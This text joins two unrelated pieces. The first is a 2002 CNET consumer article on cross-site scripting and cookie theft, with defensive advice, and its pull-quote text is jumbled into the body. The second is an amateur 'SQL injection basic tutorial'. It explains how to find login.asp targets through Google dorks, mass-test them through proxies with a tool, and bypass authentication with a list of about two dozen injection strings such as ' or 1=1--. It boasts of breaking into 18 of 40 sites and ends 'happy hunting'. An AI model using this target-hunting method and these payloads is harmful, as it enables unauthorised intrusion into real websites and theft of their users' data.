Here's one more trick up hackers' sleeves

Even if hackers can't hijack your computer, they can still gain access to
your personal info--and your Web e-mail--through something called cross-
site scripting. Robert tells you the best way to protect yourself.

By Robert Vamosi
Senior associate editor, CNET Reviews
(7/25/02)
In the early days of the Internet, Web pages were flat. Now, they are dynamic, often
created on the fly and customized to incorporate your preferences. For example,
Travelocity offers information about travel to and from destinations you choose
each time you visit the site.

The advantages of dynamic pages are many: content is fresher, easier to maintain,
and easier to navigate. Unfortunately, some dynamic Web sites also expose you to
cross-site scripting (XSS), a method of capturing personal information that's
becoming increasingly popular with malicious users.

While buffer overflows offer malicious users a way to take control of your computer,
XSS rarely causes your system to be hijacked. Rather, XSS is an indirect way for a
malicious attacker to fool you into revealing personal information or to exploit a
secondary vulnerability on your desktop browser or within a Web site's server.

XSS allows malicious users to hijack your Web-based e-mail accounts, manipulate
your customer settings on a site, or steal information sent in cookies, which may
include your bank account, credit card, or social security number.

XSS is a way
Let's look at cookie theft, since
for a
cookies are so widely used.
malicious
Cookies are small packets of
attacker to
information shared between
fool you into
your desktop (the client) and a
revealing
Web site (the server).
personal
information.
Cookies are not necessarily
dangerous. They allow sites
such as Amazon to recognize
you when you visit the site and
offer personalized recommendations for products you may want to buy. By storing
your password and ID, cookies allow you to automatically log on to your online bank
or stock-trading site. Cookies are site-specific; for example, BigStore.com can't
access your cookies from LittleStore.com, nor can a malicious user view all the
cookies stored on your desktop. Cookies for financial sites tend to be encrypted,
while those for e-commerce sites tend not to be.

For an attacker, the trick is to redirect your personal information to a third-party site
that he or she can access. One popular method is to use malicious links. Often,
these are sent in e-mail messages. They may appear to be legitimate URLs, but on
closer examination, you can see that they include malicious Web addresses.

Many of us--if we ever really look at the contents of a URL--tend to stop at the
http://, believing that any string of information following must be legit. Indeed, a
malicious URL could be coded in HEX, so http:// would become 0x0068, 0x0074,
0x0074, 0x0070, 0x003A, 0x002F, 0x002F, but otherwise, the URL would look like
the address for search-engine results.

Malicious users also trick us by hiding URLS in Web pages so that they look like
standard hotlinks--until you click the link or view the page's source code.

Another way attackers gain access to your personal information is to create a pop-
up asking you to reenter your username and password after you've already logged
on to a legitimate Web site. Your browser (and your cookie info) are then sent to a
third-party site that looks just like the legitimate one, but it's a fake that the
malicious user can access. Since your browser might recognize the spoofed site as a
trusted site--it thinks it's the same as the legit site--the malicious user could, with a
well-crafted script, run potentially damaging code on your computer.

Most attack methods these days require malicious users to be sitting at a terminal,
waiting for you to open yourself up to harm, as opposed to a virus writer, who lets
loose his or her virus and then sits back and waits days or weeks for the damage to
be done. David Endler of iDefense Labs, however, thinks this won't always be the
case. In a recent white paper (click here to download the PDF file), Endler says
future XSS exploits could easily be automated. For example, a malicious user could
set up a script that would send him or her e-mail whenever you access your Web-
based e-mail account.

So what can you do to protect yourself? You can turn off your browser's JavaScript,
but that will restrict the number of sites you can visit. You also can monitor all your
cookie transactions, accepting or denying them individually. If you use Microsoft's
Internet Explorer, you should set your security levels to High. Also, be wary of
clicking URLs from people or sites you do not know or trust. But all of these will
inconvenience you and may not even prevent an attack.
What is needed is more protection on Be wary of
the sites themselves, as well as better clicking URLs
programming and application from people
security on the server side. The good or sites you
news is that the problem was much do not know
worse two or three years ago, when
or trust.
e-commerce sites were going online
overnight, with little regard for
customer security.

My advice: be careful where you click, and to whom you give your username or password. The
information might not be going to the source you intended.
SQL injection Basic Tutorial
One of the major problems with SQL is its poor security issues surrounding is the login and url
strings.
this tutorial is not going to go into detail on why these string work as am not a coder i just know
what i know and it works
If you are interested in this topic we have many articles related to SQL Injection also if you
would like help with the topic
you can ask in our information security forum where thousands of members can help you.

SEARCH:

admin\login.asp
login.asp

with these two search string you will have plenty of targets to chose from...finding
one thats vulnerable is another question

WHAT I DO :
first let me go into details on how i go about my research
i have gathered plenty of injection strings for quite some time like these below and have just
been granted access to a test machine and will be testing for many variations and new
inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member..
http://governmentsecurity.org "thanks mate" .. gives me a chance to concentrate on what am
doing and not be looking over my shoulder

INJECTION STRINGS:HOW ?

this is the easiest part...very simple

on the login page just enter something like

user:admin (you dont even have to put this.)

pass:' or 1=1--
or

user:' or 1=1--
admin:' or 1=1--

some sites will have just a password so

password:' or 1=1--

infact i have compiled a combo list with strings like this to use on my chosen targets ....there are
plenty of strings about , the list below is a sample of the most common used

there are many other strings involving for instance UNION table access via reading the error
pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper

the one am interested in are quick access to targets

PROGRAM
i tried several programs to use with these search strings and upto now only Ares has peformed
well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18
positive hits in a few minutes

how long would it take to go thought 40 sites cutting and pasting each string ??

combo example:

admin:' or a=a--
admin:' or 1=1--

and so on...it dont have to be admin can be anything you want... the most important part is
example:' or 1=1-- this is our injection

string

now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp
or whatever

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result:

http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search
17,000 possible targets trying various searches spews out plent more

now using proxys set in my browser i then click through interesting targets...seeing whats what
on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential
targets like so

http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp

and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or
spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow
for me

i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo
list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...

sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target
it will spew all the strings on that site as vulnerable...you have to go through each one on the site

by cutting and pasting the string till you find the right one..but the thing is you
know you CAN access the site ...really i need a program that will return the hit with a click on
url and ignore false outputs

am still looking....thing is it saves quite a bit of time going to each site and each
string to find its not exploitable.

there you go you should have access to your vulnerable target by now

another thing you can use the strings in the urls were user=? edit the url to the = part and paste '
or 1=1-- so it becomes

user=' or 1=1-- just as quick as login process

(Variations)

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --
' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

happy hunting

ComSec aka ZSL